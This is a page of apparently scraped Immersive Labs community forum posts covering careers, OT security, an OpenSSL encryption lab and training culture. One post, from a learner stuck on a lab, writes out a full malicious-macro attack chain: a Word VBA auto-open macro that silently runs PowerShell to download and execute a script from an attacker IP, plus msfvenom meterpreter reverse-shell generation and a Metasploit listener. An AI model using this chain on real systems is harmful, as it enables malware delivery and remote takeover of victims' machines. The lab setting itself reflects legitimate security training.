Thank you, Immersive Labs
For your kindness and genius. And for allowing us to be a little bit wiser every day; thank you for your practical and theoretical labs (I have even smiled with some of them :)). Thank you for making us investigate, for going a little further; and for having an impact on our customers: protecting them better. Thank you for allowing us to work with recent CVEs from various perspectives (attack, defense and post-mortem). Thank you for your effort and for making it possible. Here's to many more years! :).
Wondering about potential jobs offered after completion of labs....
Hi - I was wondering about the jobs available after completing the labs. I've been a support engineer for five years now, most recently a senior engineer at a Silicon Valley MSP. I've already earned a one-year college Cybersecurity Networking certification from a community college (with a 3.9 GPA) and the Security+. Can someone give me an idea of potential companies? Also are any of the positions remote? I live in the northern California mountains....
Operational Technology a Concern?
"Hey Immersive Labs community, I'm curious about your experiences with Operational Technology (OT) in your organizations. With the increasing convergence of IT and OT across healthcare, education, and various industries, I'm seeing more medical devices, building automation systems, and industrial control systems becoming part of our daily operations. A few questions for the community: How are you currently handling OT security challenges in your environment? What knowledge gaps do you see in your teams when it comes to securing OT systems? For those in healthcare or campus environments - what specific OT challenges keep you up at night? What skills do you wish your teams had to better manage OT security? I believe this is becoming increasingly important as more connected devices and control systems enter our networks. Would love to hear your thoughts and experiences - both challenges and successes. Looking forward to learning from everyone's perspectives!"
Weaponization: Payloads – Office Macros
I've been banging my head against this brick wall for a few hours now and I could use a second set of eyes. 1. I've created a macro enabled word doc with the following vb code on windows machine: Sub Document_Open() Dim ps as String ps = "powershell.exe -NoExit Invoke-Expression (New-Object Net.WebClient).DownloadString('http://MY_KALI_IP/shell.ps1')" process = Shell(ps, vbhide) End Sub 2. python3 -m http.server to start server to serve shell.ps1 on request 3. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -f psh > shell.ps1 to create reverse shell with same name the command in the macro script will go looking for 4. create listener with sudo msfconsole, use exploit/multi/handler, set payload windows/meterpreter/reverse_tcp, set LHOST KALI IP, set LPORT 443 then exploit to start listener 5. back on windows machine, go to target_ip:8888, browse to macro doc, submit and execute. What am I missing?What do you prioritise during team cyber attack simulations?
Are you responsible for creating and/or assigning cyber attack simulations to teams within your organisation? 🚨 These planned and facilitated exercise are designed to test and evaluate an organisation's preparedness and response capabilities in the event of a cyber incident, and we are looking to understand how you prioritise aspects of these team events. Please share your expertise with us by answering 2 questions about what is most important to you when planning and running these exercises. Your feedback will help to shape future Immersive products. https://www.surveymonkey.com/r/drills-priorities Thank you!Modern Encryption: Demonstrate your skills
I am in the final lab of this collection and the step 3 I need to encrypt the file using aes 256 encryption using the following command and similar other commands I am using for setup 4 & 5 however the commands execute succesfully and a encrypted file is generated however a key file is not generated to decrypt the remaining for encrypted file to complete the lab. I need the help to solve this lab and get the badge. step 3- openssl enc -aes-256-cbc -a -pbkdf2 -nosalt -in plaintext_1.txt -out plaintext_1.enc step 4- Encrypt a file using RC4 openssl enc -rc4 -d -pbkdf2 -nosalt -in plaintext_2.txt -out plaintext_2.enc step 5- Encrypt a file using RC4 openssl enc --des-ede3-cbc -d -pbkdf2 -nosalt -in plaintext_3.txt -out plaintext_3.encThe Importance of Curating a Culture of Upskilling & Career Progression, rather than Mandatory Training.
As cyber professionals, we know how important it is for teams to stay up to date in order to evidence their readiness to respond to the latest threats. But what can we do to curate a culture of upskilling & career progression, rather than mandatory training? ✍️ We want to hear from you! Have you achieved success in these efforts? If so, how? How does the culture surrounding upskilling affect employee morale and retention? What tips would you give to someone just beginning this cultural shift? How can this culture be used in areas other than cyber? Comment below! ⬇️
